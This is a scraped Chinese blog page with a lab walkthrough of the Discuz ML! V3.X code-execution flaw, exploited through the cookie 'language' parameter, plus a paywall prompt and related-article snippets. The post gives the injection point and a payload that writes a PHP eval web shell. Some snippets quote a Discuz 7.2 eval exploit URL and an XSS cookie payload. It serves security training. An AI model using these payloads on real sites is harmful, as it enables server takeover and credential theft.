Discuz ML! V3.X代码执行漏洞

最新推荐文章于 2021-12-06 17:19:02 发布

原创

最新推荐文章于 2021-12-06 17:19:02 发布 · 1.4k 阅读

5 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #php #web #linux #python

Discuz ML! V3.X代码执行漏洞，攻击者通过精心构建的请求报文可以直接执行恶意的PHP代码，进一步可获取整个网站的服务器权限

【安鸾渗透实战平台】

靶场：http://whalwl.site:8042/forum.php
在这里插入图片描述

首先先用burp抓包，将抓到的数据包发送到Repeater，构造请求参数

在这里插入图片描述

在cookies里我们可以看到“CKxv_2132_language=sc”这个参数，即为漏洞点。我们将数据包发送到repeater，进行修改拼接利用burp抓包，

将tSWa_2132_language=sc 后面填上Phpinfo就会显示所有phpinfo输出的响应

因为cookie字段中language没有对参数进行过滤直接拼接从而写入缓存文件之中，儿缓存文件随后被加载，从而造成代码执行

我们可以使用file_put_contents() 函数写入一句话木马’.file_put_contents(‘shell1.php’,urldecode(’<?php eval($_POST["moo"]);?>’)).'经过编码后为%27.file_put_contents%28%27shell1.php%27%2Curldecode%28%27%253c%253fphp%25

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

信安学徒

关注关注

0
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

DiscuzML 3.x任意代码执行漏洞CNVD-2019-22239

千寻的博客

05-14

1507

文章目录0x01 简介0x02 漏洞概述0x03 影响版本0x04 漏洞编号0x05 漏洞分析0x06 环境搭建第一步使用phpstudy搭建网站，第二步解开源码压缩包，进行安装第三步下一步第四步运行环境选择全新安装第五步填写数据库及管理员信息第六步安装完成第七步点击上方链接访问网站0x07 漏洞复现第一步访问网站第二步抓取数据包，进行数据包重放第三步发包后出现phpinfo信息，证明漏洞存在。第四步对漏洞进行利用，获取目标网站权限，第五步管理工具进行连接0x08 漏洞修复免责声明

Discuz 7.x/6.x 全局变量防御绕过导致代码执行

haha1314的博客

07-15

1069

Discuz 7.x/6.x 全局变量防御绕过导致代码执行 由于php5.3.x版本里php.ini的设置里request_order默认值为GP，导致$_REQUEST中不再包含$_COOKIE，我们通过在Cookie中传入$GLOBALS来覆盖全局变量，造成代码执行漏洞。漏洞复现安装成功后，直接找一个已存在的帖子，向其发送数据包，并在Cookie中增加GLOBALS[_DCACHE][sm...

参与评论您还未登录，请先登录后发表或查看评论

Discuz!ML 3.x任意代码执行漏洞

logan_logan的博客

07-29

1944

1.简介影响系统及版本：Discuz!ML V3.2-3.4 漏洞原因：Discuz!ML系统对cookie中接收的language参数内容未过滤，导致字符串拼接，从而执行php代码。 2.环境搭建网站环境：phpstudy_pro DisCuz版本：3.4 PHP版本：php5.4.45nts Apache版本：2.4.39 Mysql版本：5.7.26 3.Discuz安装将源码复制到网站根目录下；在网页输入地址打开安装界面，然后一直下一步就ok了； 4.漏洞复现用火狐浏览器打开，

Discuz! ML远程代码执行(CVE-2019-13956)

WY92139010的博客

08-24

532

Discuz! ML远程代码执行(CVE-2019-13956) 一、漏洞描述该漏洞存在discuz ml(多国语言版)中,cookie中的language可控并且没有严格过滤,导致可以远程代码执行。二、漏洞影响版本 Discuz! ML V3.2 Discuz! ML V3.3 Discuz! ML V3.4 三、漏洞环境搭建 1、官网下载Discuz! ML V...

Discuz x3.1 utility/convert/config.inc.php漏洞get shell

灰蜗牛

09-26

8094

Discuz x3.1 utility/convert/config.inc.php漏洞get shell i 春秋 --- 竞赛训练 -- 这不是DZ？

discuz！ML 3.x代码执行漏洞的利用笔记

边城浪子的博客

09-18

1482

服务器：windows 2003 攻击机：windows 10 搭建过程：下载discuz！ML 3.x源码链接：https://pan.baidu.com/s/1QFd8rdXn_Je6lOehSLTIWw 提取码：5ka0 step1:在windows 2003中安装phpstudy step2:将源码中upload中的文件上传至phpstudy的www目录中。 step3:打...

Discuz! X 3.4 ML 任意代码执行漏洞复现

墙角睡大觉的专栏

07-13

4253

0X1 漏洞概述 2019年7月11日，网络上出现了一个Discuz！ML远程代码执行漏洞的PoC，研究员验证分析发现，攻击者能够利用该漏洞在请求流量的cookie字段中（language参数）插入任意代码，执行任意代码，从而实现完全远程接管整个服务器的目的，该漏洞利用方式简单，危害性较大。漏洞影响范围包括如下版本。 Discuz! ML v.3.4、Discuz! ML v.3.3、Discuz...

python评估函数_python – 动态函数创建和函数体评估

weixin_39818662的博客

12-15

336

请考虑以下Python 3说明res = []for a in range(3) :res.append(lambda n : n + a)为了构建三个函数res [0],res [1]和res [2]的列表res,使得res [i](n)为[0,1,2]中的所有i返回n i.然而,人们得到了>>> res[0](0)2代替>>> res[0](0)0一个人也有...

【漏洞复现】Discuz-x3.1 插件漏洞

weixin_47443077的博客

05-27

2365

Discuz-x3.1 插件漏洞文章目录Discuz-x3.1 插件漏洞一、漏洞背景二、信息收集三、漏洞利用一、漏洞背景作为国内最大的社区软件及服务提供商，Comsenz旗下的 Discuz! 开发组具有丰富的 web应用程序设计经验，尤其在论坛产品及相关领域，经过长期创新性开发，掌握了一整套从算法，数据结构到产品安全性方面的领先技术。使得 Discuz! 无论在稳定性、负载能力、安全保障等方面都居于国内外同类产品领先地位。二、信息收集本地IIS搭建Discuz-x3.1，发现不能直接访问进行

dz x3 html,Discuz x3.4前台SSRF漏洞分析

weixin_30346025的博客

07-01

977

【漏洞分析】Discuz X3.3补丁安全分析

vspiders的博客

08-26

2617

0x01 漏洞分析漏洞发生在页面/upload/source/admincp/admincp_setting.php页面，看源码 $settingnew = $_GET['settingnew']; if($operation == 'credits') { $extcredits_exists = 0; foreach($settingnew['extcredits'] as

Discuz Ml v3.x 前台Getshell姿势 Discuz漏洞

god_Zeo的安全博客

07-14

6834

Discuz Ml v3.x 前台Getshell姿势1.漏洞描述2.原理3.影响版本4.利用过程4.getshell POC请勿用于非法用途 1.漏洞描述 Discuz！ML是一个由CodersClub.org创建的多语言，集成，功能齐全的开源网络平台，用于构建像“社交网络”这样的互联网社区。 2019年7月11日， Discuz！ML被发现存在一处远程代码执行漏洞，攻击者通过在请求流量的coo...

discuzX3.0_存储型xss跨站漏洞-学习笔记

小龙在线

08-17

718

漏洞名称 discuzx3.0 _存储型xss跨站漏洞发布时间 2014-01-27 漏洞分类存储型xss漏洞缺陷代码没有对网络url地址参数进行过滤。实验步骤打开目标站点，发表日志，点选网络图片，输入以下代码http://www.22222.cc/a.gif"onerror=javascript:alert(document.cookie)> 保存链接，并发表日志。此时如果点击该日志链接会出现弹窗。分析和思考 xss存储型xss跨站的危害是盗取各类用户帐号，如机器登录帐号、用户网

Discuz快照被劫持:DZ被挂马常被利用漏洞都在这

lixon166的博客

02-23

1811

0x00 网站快照劫持:DZ常见漏洞利用分析 0x01Discuz上传图片附件实现远程命令执行漏洞漏洞产生过程：forum_image.php中的$w,$h变量可控，末处理直接传入Thumb()函数，经该函数传入Thumb_IM()函数，最终调用exec()导致远程命令执行漏洞。通过分析可知：需要forum.php调用image_class模块调用图像预览功能，后台上传设置为ImagicMagick库，默认为GD库渲染。前台登录发贴上传图片附件。提示:forum.php是常被利用的文...

Discuz 3.x 任意文件删除漏洞复现

qq_41048303的博客

12-06

2465

Discuz!X ≤3.4 任意文件删除漏洞 1.漏洞环境执行docker-compose up -d 启动后，访问http://192.168.1.142/install来安装discuz 2.漏洞复现访问http://192.168.1.142/robots.txt可见robots.txt是存在的注册用户hahaha 在个人设置页面找到自己的formhash 带上自己的Cookie、formhash发送如下数据包查看个人设置页面的出生地构造upload.ht

Discuz 7.2漏洞入侵图解

kuxing100的专栏

05-06

4562

Discuz 7.2漏洞入侵图解找到一个论坛,注册一个账号注册好后，使用exp 复制以下代码： http://此处为论坛地址/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=${${eval(chr(102).chr(112).chr(117).chr(11

[漏洞案例]Discuz ML! V3.X 代码注入漏洞

baguangman5501的博客

07-13

804

0x00 前言 Discuz！ML是一个由CodersClub.org创建的多语言，集成，功能齐全的开源网络平台，用于构建像“社交网络”这样的互联网社区。该引擎基于Comsenz Inc.创建的着名的Discuz！X引擎开发。 0x01 漏洞描述 1.1 简单描述 2019年7月11日， Discuz！ML被发现存在一处远程代码执行漏洞，攻击者通过在请求流量的cookie字段中的la...

Discuz NT 多个版本文件上传漏洞

fengling132的专栏

05-09

1739

【1】漏洞预警 | Discuz ML! V3.X 代码注入漏洞

司徒荆的博客

07-11

1027

Discuz ML! V3.X存在代码注入漏洞，攻击者通过精心构建的请求报文可以直接执行恶意的PHP代码，进一步可获取整个网站的服务器权限。

Discuz!X1.X实用工具包：密码重置与数据库修复

X1.X_20101124_1.5.5M”这个名字表明这是一款针对Discuz!X1.X版本的论坛管理工具，版本号为20101124，包大小为1.5.5MB。Discuz!X1.X是康盛公司（Comsenz）开发的一款基于PHP和MySQL的开源论坛程序，它是继Discuz!NT...